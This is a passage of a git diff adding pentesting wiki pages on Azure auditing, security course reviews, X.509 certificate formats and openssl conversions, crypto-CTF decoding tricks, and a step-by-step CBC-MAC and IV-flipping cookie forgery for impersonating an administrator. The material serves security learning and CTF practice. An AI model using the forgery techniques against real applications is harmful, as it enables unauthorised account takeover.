+ +#Azure-CIS-Scanner,CIS scanner for Azure (https://github.com/kbroughton/azure_cis_scanner) +pip3 install azure-cis-scanner #Install +azscan #Run, login before with `az login` +``` + +### Attack Graph + +[**Stormspotter** ](https://github.com/Azure/Stormspotter)creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work. + +### More checks + +* Check for a **high number of Global Admin** \(between 2-4 are recommended\). Access it on: [https://portal.azure.com/\#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview](https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/Overview) +* Global admins should have MFA activated. Go to Users and click on Multi-Factor Authentication button. + +![](../.gitbook/assets/image%20%28281%29.png) + +* Dedicated admin account shouldn't have mailboxes \(they can only have mailboxes if they have Office 365\). +* Local AD shouldn't be sync with Azure AD if not needed\([https://portal.azure.com/\#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/AzureADConnect](https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/AzureADConnect)\). And if synced Password Hash Sync should be enabled for reliability. In this case it's disabled: + +![](../.gitbook/assets/image%20%2852%29.png) + +* **Global Administrators** shouldn't be synced from a local AD. Check if Global Administrators emails uses the domain **onmicrosoft.com**. If not, check the source of the user, the source should be Azure Active Directory, if it comes from Windows Server AD, then report it. + +![](../.gitbook/assets/image%20%2889%29.png) + +* **Standard tier** is recommended instead of free tier \(see the tier being used in _Pricing & Settings_ or in [https://portal.azure.com/\#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/24](https://portal.azure.com/#blade/Microsoft_Azure_Security/SecurityMenuBlade/24)\) +* **Periodic SQL servers scans**: + + _Select the SQL server_ --> _Make sure that 'Advanced data security' is set to 'On'_ --> _Under 'Vulnerability assessment settings', set 'Periodic recurring scans' to 'On', and configure a storage account for storing vulnerability assessment scan results_ --> _Click Save_ + +* **Lack of App Services restrictions**: Look for "App Services" in Azure \([https://portal.azure.com/\#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites)\) and check if anyone is being used. In that case check go through each App checking for "Access Restrictions" and there aren't rules, report it. The access to the app service should be restricted according to the needs. + +## Office365 + +You need **Global Admin** or at least **Global Admin Reader** \(but note that Global Admin Reader is a little bit limited\). However, those limitations appear in some PS modules and can be bypassed accessing the features via the web application. + +## AWS + +Get objects in graph: [https://github.com/FSecureLABS/awspx](https://github.com/FSecureLABS/awspx) + diff --git a/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md b/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md new file mode 100644 index 00000000000..2c4c9a30fcc --- /dev/null +++ b/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md @@ -0,0 +1,51 @@ +# INE Courses and eLearnSecurity Certifications Reviews + +## eLearnSecurity Mobile Application Penetration Tester \(eMAPT\) and the respective INE courses + +### Course: [**Android & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting)\*\*\*\* + +This is the course to **prepare for the eMAPT certificate exam**. It will teach you the **basics of Android** as OS, how the **applications works**, the **most sensitive components** of the Android applications, and how to **configure and use** the main **tools** to test the applications. The goal is to **prepare you to be able to pentest Android applications in the real life**. + +I found the course to be a great one for **people that don't have any experience pentesting Android** applications. However, **if** you are someone with **experience** in the topic and you have access to the course I also recommend you to **take a look to it**. That **was my case** when I did this course and even having a few years of experience pentesting Android applications **this course taught me some Android basics I didn't know and some new tricks**. + +Finally, note **two more things** about this course: It has **great labs to practice** what you learn, however, it **doesn't explain every possible vulnerability** you can find in an Android application. Anyway, that's not an issue as **it teach you the basics to be able to understand other Android vulnerabilities**. +Besides, once you have completed the course \(or before\) you can go to the [**Hacktricks Android Applications pentesting section**](../mobile-apps-pentesting/android-app-pentesting/) and learn more tricks. + +### Course: [**iOS & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting)\*\*\*\* + +When I performed this course I didn't have much experience with iOS applications, and I found this **course to be a great resource to get me started quickly in the topic, so if you have the chance to perform the course don't miss the opportunity.** As the previous course, this course will teach you the **basics of iOS**, how the **iOS** **applications works**, the **most sensitive components** of the applications, and how to **configure and use** the main **tools** to test the applications. +However, there is a very important difference with the Android course, if you want to follow the labs, I would recommend you to **get a jailbroken iOS or pay for some good iOS emulator.** + +As in the previous course, this course has some very useful labs to practice what you learn, but it doesn't explain every possible vulnerability of iOS applications. However, that's not an issue as **it teach you the basics to be able to understand other iOS vulnerabilities**. +Besides, once you have completed the course \(or before\) you can go to the [**Hacktricks iOS Applications pentesting section**](../mobile-apps-pentesting/ios-pentesting/) and learn more tricks. + +### [eMAPT](https://elearnsecurity.com/product/emapt-certification/) + +> The eLearnSecurity Mobile Application Penetration Tester \(eMAPT\) certification is issued to cyber security experts that display advanced mobile application security knowledge through a scenario-based exam. + +The goal of this certificate is to **show** that you are capable of performing common **mobile applications pentests**. + +During the exam you are **given 2 vulnerable Android applications** and you need to **create** an A**ndroid** **application** that **exploits** the vulnerabilities automatically. In order to **pass the exam**, you need to **send** the **exploit** **application** \(the apk and the code\) and it must **exploit** the **other** **apps** **vulnerabilities**. + +Having done the [**INE course about Android applications pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting) **is** **more than enough** to find the vulnerabilities of the applications. What I found to be more "complicated" of the exam was to **write an Android application** that exploits vulnerabilities. However, having some experience as Java developer and looking for tutorials on the Internet about what I wanted to do **I was able to complete the exam in just some hours**. They give you 7 days to complete the exam, so if you find the vulnerabilities you will have plenty of time to develop the exploit app. + +In this exam I **missed the opportunity to exploit more vulnerabilities**, however, **I lost a bit the "fear" to write Android applications to exploit a vulnerability**. So it felt just like **another part of the course to complete your knowledge in Android applications pentesting**. + +## eLearnSecurity Web application Penetration Tester eXtreme \(eWPTXv2\) and the INE course related + +### Course: [**Web Application Penetration Testing eXtreme**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)\*\*\*\* + +This course is the one meant to **prepare** you for the **eWPTXv2** **certificate** **exam**. +Even having been working as web pentester for several years before doing the course, it taught me several **neat hacking tricks about "weird" web vulnerabilities and ways to bypass protections**. Moreover, the course contains **pretty nice labs where you can practice what you learn**, and that is always helpful to fully understand the vulnerabilities. + +I think this course **isn't for web hacking beginners** \(there are other INE courses for that like [**Web Application Penetration Testing**](https://my.ine.com/CyberSecurity/courses/38316560/web-application-penetration-testing)**\).** However, ****if you aren't a beginner, independently on the hacking web "level" you think you have, **I definitely recommend you to take a look to the course** because I'm sure you **will learn new things** like I did. + +### [eWPTXv2](https://elearnsecurity.com/product/ewptxv2-certification/) + +> The eLearnSecurity Web Application Penetration Tester eXtreme \(eWAPTX\) is our most advanced web application pentesting certification. The eWPTX exam requires students to perform an expert-level penetration test that is then assessed by INE’s cyber security instructors. Students are expected to provide a complete report of their findings as they would in the corporate sector in order to pass. + +The exam was composed of a **few web applications full of vulnerabilities**. In order to pass the exam you will need to compromise a few machines abusing web vulnerabilities. However, note that that's not enough to pass the exam, you need to **send a professional pentest report detailing** all the vulnerabilities discovered, how to exploit them and how to remediate them. +**I reported more than 10 unique vulnerabilities** \(most of them high/critical and presented in different places of the webs\), including the read of the flag and several ways to gain RCE and I passed. + +**All the vulnerabilities I reported could be found explained in the** [**Web Application Penetration Testing eXtreme course**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)**.** However, order to pass this exam I think that you **don't only need to know about web vulnerabilities**, but you need to be **experienced exploiting them**. So, if you are doing the course, at least practice with the labs and potentially play with other platform where you can improve your skills exploiting web vulnerabilities. + diff --git a/crypto/certificates.md b/crypto/certificates.md new file mode 100644 index 00000000000..e939f56bdd3 --- /dev/null +++ b/crypto/certificates.md @@ -0,0 +1,176 @@ +# Certificates + +## What is a Certificate + +In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner \(called the subject\), and the digital signature of an entity that has verified the certificate's contents \(called the issuer\). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject. + +In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) \(PKI\) scheme, the certificate issuer is a [certificate authority](https://en.wikipedia.org/wiki/Certificate_authority) \(CA\), usually a company that charges customers to issue certificates for them. By contrast, in a [web of trust](https://en.wikipedia.org/wiki/Web_of_trust) scheme, individuals sign each other's keys directly, in a format that performs a similar function to a public key certificate. + +The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure \(X.509\)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280. + +## x509 Common Fields + +* **Version Number:** Version of x509 format. +* **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information. +* **Subject**: The entity a certificate belongs to: a machine, an individual, or an organization. + * **Common Name**: Domains affected by the certificate. Can be 1 or more and can contain wildcards. + * **Country \(C\)**: Country + * **Distinguished name \(DN\)**: The whole subject: `C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net` + * **Locality \(L\)**: Local place + * **Organization \(O\)**: Organization name + * **Organizational Unit \(OU\)**: Division of an organisation \(like "Human Resources"\). + * **State or Province \(ST, S or P\)**: List of state or province names +* **Issuer**: The entity that verified the information and signed the certificate. + * **Common Name \(CN\)**: Name of the certificate authority + * **Country \(C\)**: Country of the certificate authority + * **Distinguished name \(DN\)**: Distinguished name of the certificate authority + * **Locality \(L\)**: Local place where the organisation can be found. + * **Organization \(O\)**: Organisation name + * **Organizational Unit \(OU\)**: Division of an organisation \(like "Human Resources"\). +* **Not Before**: The earliest time and date on which the certificate is valid. Usually set to a few hours or days prior to the moment the certificate was issued, to avoid [clock skew](https://en.wikipedia.org/wiki/Clock_skew#On_a_network) problems. +* **Not After**: The time and date past which the certificate is no longer valid. +* **Public Key**: A public key belonging to the certificate subject. \(This is one of the main parts as this is what is signed by the CA\) + * **Public Key Algorithm**: Algorithm used to generate the public key. Like RSA. + * **Public Key Curve**: The curve used by the elliptic curve public key algorithm \(if apply\). Like nistp521. + * **Public Key Exponent**: Exponent used to derive the public key \(if apply\). Like 65537. + * **Public Key Size**: The size of the public key space in bits. Like 2048. + * **Signature Algorithm**: The algorithm used to sign the public key certificate. + * **Signature**: A signature of the certificate body by the issuer's private key. +* **x509v3 extensions** + * **Key Usage**: The valid cryptographic uses of the certificate's public key. Common values include digital signature validation, key encipherment, and certificate signing. + * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `Digital Signature` + * **Extended Key Usage**: The applications in which the certificate may be used. Common values include TLS server authentication, email protection, and code signing. + * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `TLS Web Server Authentication` + * **Subject Alternative Name:** Allows users to specify additional host **names** for a single SSL **certificate**. The use of the SAN extension is standard practice for SSL certificates, and it's on its way to replacing the use of the common **name**. + * **Basic Constraint:** This extension describes whether the certificate is a CA certificate or an end entity certificate. A CA certificate is something that signs certificates of others and a end entity certificate is the certificate used in a web page for example \(the last par of the chain\). + * **Subject Key Identifier** \(SKI\): This extension declares a unique **identifier** for the public **key** in the certificate. It is required on all CA certificates. CAs propagate their own SKI to the Issuer **Key Identifier** \(AKI\) extension on issued certificates. It's the hash of the subject public key. + * **Authority Key Identifier**: It contains a key identifier which is derived from the public key in the issuer certificate. It's the hash of the issuer public key. + * **Authority Information Access** \(AIA\): This extension contains at most two types of information : + * Information about **how to get the issuer of this certificate** \(CA issuer access method\) + * Address of the **OCSP responder from where revocation of this certificate** can be checked \(OCSP access method\). + * **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate. + * **CT Precertificate SCTs**: Logs of Certificate transparency regarding the certificate + +### Difference between OSCP and CRL Distribution Points + +**OCSP** \(RFC 2560\) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**. +**CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries. +From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm#:~:text=OCSP%20%28RFC%202560%29%20is%20a,to%20download%20the%20entire%20CRL.&text=A%20CRL%20provides%20a%20list,or%20are%20no%20longer%20valid.). + +### What is Certificate Transparency + +Certificate Transparency aims to remedy certificate-based threats by **making the issuance and existence of SSL certificates open to scrutiny by domain owners, CAs, and domain users**. Specifically, Certificate Transparency has three main goals: + +* Make it impossible \(or at least very difficult\) for a CA to **issue a SSL certificate for a domain without the certificate being visible to the owner** of that domain. +* Provide an **open auditing and monitoring system that lets any domain owner or CA determine whether certificates have been mistakenly or maliciously** issued. +* **Protect users** \(as much as possible\) from being duped by certificates that were mistakenly or maliciously issued. + +#### **Certificate Logs** + +Certificate logs are simple network services that maintain **cryptographically assured, publicly auditable, append-only records of certificates**. **Anyone can submit certificates to a log**, although certificate authorities will likely be the foremost submitters. Likewise, anyone can query a log for a cryptographic proof, which can be used to verify that the log is behaving properly or verify that a particular certificate has been logged. The number of log servers doesn’t have to be large \(say, much less than a thousand worldwide\), and each could be operated independently by a CA, an ISP, or any other interested party. + +#### Query + +You can query the logs of Certificate Transparency of any domain in [https://crt.sh/](https://crt.sh/). + +## Formats + +There are different formats that can be used to store a certificate. + +#### **PEM Format** + +* It is the most common format used for certificates +* Most servers \(Ex: Apache\) expects the certificates and private key to be in a separate files - Usually they are Base64 encoded ASCII files - Extensions used for PEM certificates are .cer, .crt, .pem, .key files - Apache and similar server uses PEM format certificates + +#### **DER Format** + +* The DER format is the binary form of the certificate +* All types of certificates & private keys can be encoded in DER format +* DER formatted certificates do not contain the "BEGIN CERTIFICATE/END CERTIFICATE" statements +* DER formatted certificates most often use the ‘.cer’ and '.der' extensions +* DER is typically used in Java Platforms + +#### **P7B/PKCS\#7 Format** + +* The PKCS\#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c +* A P7B file only contains certificates and chain certificates \(Intermediate CAs\), not the private key +* The most common platforms that support P7B files are Microsoft Windows and Java Tomcat + +#### **PFX/P12/PKCS\#12 Format** + +* The PKCS\#12 or PFX/P12 format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file +* These files usually have extensions such as .pfx and .p12 +* They are typically used on Windows machines to import and export certificates and private keys + +### Formats conversions + +**Convert x509 to PEM** + +```text +openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem +``` + +#### **Convert PEM to DER** + +```text +openssl x509 -outform der -in certificatename.pem -out certificatename.der +``` + +**Convert DER to PEM** + +```text +openssl x509 -inform der -in certificatename.der -out certificatename.pem +``` + +**Convert PEM to P7B** + +**Note:** The PKCS\#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c. ****A P7B file only contains certificates and chain certificates \(Intermediate CAs\), not the private key. The most common platforms that support P7B files are Microsoft Windows and Java Tomcat. + +```text +openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer +``` + +**Convert PKCS7 to PEM** + +```text +openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem +``` + +**Convert pfx to PEM** + +**Note:** The PKCS\#12 or PFX format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file. PFX files usually have extensions such as .pfx and .p12. PFX files are typically used on Windows machines to import and export certificates and private keys. + +```text +openssl pkcs12 -in certificatename.pfx -out certificatename.pem +``` + +**Convert PFX to PKCS\#8** +**Note:** This requires 2 commands + +**1- Convert PFX to PEM** + +```text +openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem +``` + +**2- Convert PEM to PKCS8** + +```text +openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8 +``` + +**Convert P7B to PFX** +**Note:** This requires 2 commands + +1- **Convert P7B to CER** + +```text +openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer +``` + +**2- Convert CER and Private Key to PFX** + +```text +openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer +``` + diff --git a/crypto/cipher-block-chaining-cbc-mac-priv.md b/crypto/cipher-block-chaining-cbc-mac-priv.md new file mode 100644 index 00000000000..01d3f011fd1 --- /dev/null +++ b/crypto/cipher-block-chaining-cbc-mac-priv.md @@ -0,0 +1,65 @@ +--- +description: 'https://pentesterlab.com/' +--- + +# Cipher Block Chaining CBC-MAC + +**Post from** [**https://pentesterlab.com/**](https://pentesterlab.com/)\*\*\*\* + +## CBC + +The easiest attack to test is that if the cookie just the username encrypted. + +If the cookie is only the username \(or the first part of the cookie is the username\) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and bruteforce the first byte of the cookie. + +## CBC-MAC + +CBC-MAC is a method to ensure integrity of a message by encrypting it using CBC mode and keeping the last encrypted block as "signature". This ensures that a malicious user can not modify any part of the data without having to change the signature. The key used for the "encryption" ensures that the signature can't be guessed. + +However, when using CBC-MAC, the developer needs to be very careful if the message are not of fixed length. In this example, we will use the fact that there is no protection in place to get the application to sign two messages and build another message by concatenating the two messages. + +## Theory + +With CBC-MAC, we can generate two signatures `t` and `t'` for the messages `m` and `m'`. By using `m` and `m'` we can forge another message `m''` that will have the same signature as `m'` \(`t'`\). One thing to keep in mind is that the recommended way to use CBC-MAC is to use a NULL IV. + +To keep things simple, we are going to work on a single block for each message. + +We can see below how signing both messages works \(NB: both signatures are completely independent from each other\): + +![](https://pentesterlab.com/cbc-mac/cbc-mac-1.png) + +If we try to concatenate those messages, the signature is no longer valid \(since `t` is now the IV for the second block where it was only NULL before\): + +![](https://pentesterlab.com/cbc-mac/cbc-mac-2.png) + +However, if we XOR `m'` and `t`, the signature is now `t'`: + +![](https://pentesterlab.com/cbc-mac/cbc-mac-3.png) + +## Implementation + +Based on the size of the signature, we can guess that the block size is likely to be 8. With this information, we will split `administrator`: + +* `administ` +* `rator\00\00\00` + +We can trivially generate the signature for the first block, by just logging in and retrieving the signature `t`. + +For the second block, we want the `m'` XOR `t` to be equal to `rator\00\00\00`. So to generate the second username we will need to XOR `rator\00\00\00` with `t` \(since the application will sign it with a NULL IV instead of `t`\). Once we have this value, we can get the signature `t'`. + +Finally, we just need to concatenate `m` and `m'` to get `administrator` and use `t'` as signature. + +#### Resume + +1. Get the signature of username **administ** = **t** +2. Get the signature of username **rator\x00\x00\x00 XOR t** = **t'** +3. Set in the cookie the value **administrator+t'** \(**t'** will be a valid signature of **\(rator\x00\x00\x00 XOR t\) XOR t** = **rator\x00\x00\x00** + +### CBC-MAC simple attack \(controlling IV\) + +If you can control the used IV the attack could be very easy. + +To impersonate the user "**administrator**" you can create the user "**Administrator**" and you will have the cookie with the **username+signature** and the cookie with the **IV**. + +To generate the cookies of the username "**administrator**" change the first cookie and set the username from "**Administrator**" to "**administrator**". Change the first byte of the cookie of the **IV** so **IV\[0\] XOR "A" == IV'\[0\] XOR "a"**. Using these cookies you can login as administrator. + diff --git a/crypto/crypto-ctfs-tricks.md b/crypto/crypto-ctfs-tricks.md new file mode 100644 index 00000000000..b2529d9dd11 --- /dev/null +++ b/crypto/crypto-ctfs-tricks.md @@ -0,0 +1,256 @@ +# Crypto CTFs Tricks + +## Online Hashes DBs + +* _**Google it**_ +* [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240) +* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com/) +* [https://crackstation.net/](https://crackstation.net/) +* [https://md5decrypt.net/](https://md5decrypt.net/) +* [https://www.onlinehashcrack.com](https://www.onlinehashcrack.com) +* [https://gpuhash.me/](https://gpuhash.me/) +* [https://hashes.org/search.php](https://hashes.org/search.php) +* [https://www.cmd5.org/](https://www.cmd5.org/) +* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) +* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) + +## Encoders + +Most of encoded data can be decoded with these 2 ressources: + +* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) +* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) + +### Substitution Autosolvers + +* [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) +* [https://quipqiup.com/](https://quipqiup.com/) - Very good ! + +#### Caesar - ROTx Autosolvers + +* [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript) + +#### Atbash Cipher + +* [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) + +### Similar to BASE64 + +Check all bases with: [https://github.com/mufeedvh/basecrack](https://github.com/mufeedvh/basecrack) + +* **Base32** \[_A-Z2-7=_\] + * `NBXWYYLDMFZGCY3PNRQQ====` +* **Base58** \[_123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz_\] + * `2yJiRg5BF9gmsU6AC` +* **Base62** \[_0-9A-Za-z_\] + * `g2AextRZpBKRBzQ9` +* **Base64** \[_A-Za-z0-9+/=_\] + * `aG9sYWNhcmFjb2xh` +* **Base85 --> Like Ascii85** +* **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_\] + * `MIc3KiXa+Ihz+lrXMIc3KbCC` +* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_\] + * `DmPsv8J7qrlKEoY7` +* **MEGAN35** \[_3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5_\] + * `kLD8iwKsigSalLJ5` +* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_\] + * `ayRiIo1gpO+uUc7g` +* **ESAB46** \[\] + * `3sHcL2NR8WrT7mhR` +* **MEGAN45** \[\] + * `kLD8igSXm2KZlwrX` +* **TIGO3FX** \[\] + * `7AP9mIzdmltYmIP9mWXX` +* **TRIPO5** \[\] + * `UE9vSbnBW6psVzxB` +* **FERON74** \[\] + * `PbGkNudxCzaKBm0x` +* **GILA7** \[\] + * `D+nkv8C1qIKMErY1` +* **Citrix CTX1** \[\] + * `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` + +[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) + +### HackerizeXS \[_╫Λ↻├☰┏_\] + +```text +╫☐↑Λ↻Λ┏Λ↻☐↑Λ +``` + +* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) + +### Morse + +```text +.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- +``` + +* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) + +### UUencoder + +```text +begin 644 webutils_pl +M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%( +M3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/ +F3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$` +` +end +``` + +* [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu) + +### XXEncoder + +```text +begin 644 webutils_pl +hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236 +5Hol-G2xAEE++ +end +``` + +* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx) + +### YEncoder + +```text +=ybegin line=128 size=28 name=webutils_pl +ryvkryvkryvkryvkryvkryvkryvk +=yend size=28 crc32=35834c86 +``` + +* [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc) + +### BinHex + +```text +(This file must be converted with BinHex 4.0) +:#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p +-38K26%'d9J!!: +``` + +* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) + +### ASCII85 + +```text +<~85DoF85DoF85DoF85DoF85DoF85DoF~> +``` + +* [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85) + +### Dvorak keyboard + +```text +drnajapajrna +``` + +* [https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard) + +### A1Z26 + +Letters to their numerical value + +```text +8 15 12 1 3 1 18 1 3 15 12 1 +``` + +### Affine Cipher Encode + +Letter to num `(ax+b)%26` \(_a_ and _b_ are the keys and _x_ is the letter\) and the result back to letter + +```text +krodfdudfrod +``` + +### SMS Code + +**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) \(This mode is used when writing SMS\). +For example: 2=A, 22=B, 222=C, 3=D... +You can identify this code because you will see **several numbers repeated**. + +You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) + +### Bacon Code + +Substitude each letter for 4 As or Bs \(or 1s and 0s\) + +```text +00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000 +AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA +``` + +### Runes + +![](../.gitbook/assets/runes.jpg) + +## Compression + +**Raw Deflate** and **Raw Inflate** \(you can find both in Cyberchef\) can compress and decompress data without headers. + +## Easy Crypto + +### XOR - Autosolver + +* [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/) + +### Bifid + +A keywork is needed + +```text +fgaargaamnlunesuneoa +``` + +### Vigenere + +A keywork is needed + +```text +wodsyoidrods +``` + +* [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver) +* [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher) +* [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx) + +## Strong Crypto + +### Fernet + +2 base64 strings \(token and key\) + +```text +Token: +gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q== + +Key: +-s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI= +``` + +* [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) + +### Samir Secret Sharing + +A secret is splitted in X parts and to recover it you need Y parts \(_Y <=X_\). + +```text +8019f8fa5879aa3e07858d08308dc1a8b45 +80223035713295bddf0b0bd1b10a5340b89 +803bc8cf294b3f83d88e86d9818792e80cd +``` + +[http://christian.gen.co/secrets/](http://christian.gen.co/secrets/) + +### OpenSSL brute-force + +* [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) +* [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF) + +## Tools + +* [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) +* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) +* [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) + diff --git a/crypto/electronic-code-book-ecb.md b/crypto/electronic-code-book-ecb.md new file mode 100644 index 00000000000..aa6a1a92147 --- /dev/null +++ b/crypto/electronic-code-book-ecb.md @@ -0,0 +1,226 @@ +--- +description: 'https://pentesterlab.com/' +--- + +# Electronic Code Book \(ECB\) + +**Post from:** [**https://pentesterlab.com/**](https://pentesterlab.com/)\*\*\*\* + +## ECB + +ECB is an encryption mode in which the message is splitted into blocks of X bytes length and each block is encrypted separetely using a key. + +The following schema \(source: [Wikipedia](http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)\) explains this method: + 